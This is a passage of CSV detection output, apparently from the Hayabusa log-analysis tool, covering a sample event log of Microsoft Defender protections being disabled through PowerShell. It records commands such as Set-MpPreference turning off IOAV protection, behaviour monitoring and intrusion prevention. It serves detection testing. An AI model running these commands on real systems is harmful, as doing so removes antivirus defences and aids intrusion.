name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): 
name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled 
(PowerShell).evtx +2021-10-06 18:34:50.788 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:50.794 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:50.797 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:50.805 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:50.881 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableIOAVProtection 
$true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:50.962 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): 
name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" 
ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:50.962 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:50.986 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:50.989 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:50.999 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:51.010 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableBehaviorMonitoring $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:51.070 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:51.071 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:51.088 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:51.091 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:51.106 +09:00,win10-02.offsec.lan,4103,info,,PwSh 
Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:51.118 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableIntrusionPreventionSystem $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:51.134 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): 
name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; 
value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:51.134 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:51.151 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:51.155 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
